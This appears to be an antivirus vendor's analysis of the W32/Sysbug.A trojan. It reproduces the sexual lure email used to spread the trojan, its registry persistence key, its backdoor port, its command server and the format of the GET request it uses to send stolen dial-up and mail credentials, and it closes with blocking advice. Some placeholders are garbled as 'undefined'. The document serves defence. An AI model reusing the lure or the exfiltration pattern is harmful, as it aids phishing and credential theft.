Virus

W32/Sysbug.A!tr

Analysis

  • Trojan is 32bit with a compressed file size of 11,808 bytes
  • The Trojan may have been introduced to the system from an email attachment sent by a hacker or group of hackers in this format -

    From: james2003 @ hotmail.com
    Subject: Re[2]: Mary
    Hello my dear Mary,
    I have been thinking about you all night. I would like to apologize
    for the other night when we made beautiful love and did not use
    condoms. I know this was a mistake and I beg you to forgive me.
    I miss you more than anything, please call me Mary, I need you. Do
    you remember when we were having wild sex in my house? I remember it
    all like it was only yesterday. You said that the pictures would not
    come out good, but you were very wrong, they are great. I didn't want
    to show you the pictures at first, but now I think it's time for you
    to see them. Please look in the attachment and you will see what I
    mean.
    I love you with all my heart, James.
    Attachment: private.zip

  • If the Trojan is extracted from the .ZIP and run, it will bind to TCP port 5555 and await instructions from a hacker or group of hackers

  • The Trojan will copy itself into the undefinedWindowsundefined folder as "sysdeb32.exe" and then launch itself

  • The Trojan will modify the registry to auto run at next Windows startup as in this example -

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
    "SystemDebug" = C:\WINNT\sysdeb32.exe

  • The Trojan will then perform two DNS queries

  • The first DNS query is for the server named 'www.kernel.org'

  • The second DNS query is for a server named 'finance.red-host.com'

  • The Trojan communicates with the second server using the DNS response IP address 82.146.56.242 - the Trojan communicates using TCP port 80

  • The Trojan attempts to gather RAS dial-up information from the infected system and then send this data to the web server using a server side script

  • The script file is named "events.php" and the Trojan sends data in the form of a query as in this example -

    GET /events.php?id=undefineds&ip=undefineds&speed=undefinedd&timeonline=undefinedd

    where undefineds and undefinedd are machine specific values

  • The Trojan attempts to connect with the web server repeatedly

  • The Trojan contains code to write other connection information to a file named "c:\temp35.txt" - this file could contain the following types of information -

    Internet Account Name
    POP3 Password
    POP3 User Name
    NNTP Server
    NNTP User Name
    SMTP Display Name
    SMTP Email Address
    SMTP Organization Name

  • It is credible that infected systems could have this information sent to a hacker across TCP port 5555

Recommended Action

  • Add the port 5555 as a service and block access to this port for inbound and outbound traffic, (INT -> EXT) and (EXT -> INT)
  • Block access to the web address finance.red-host.com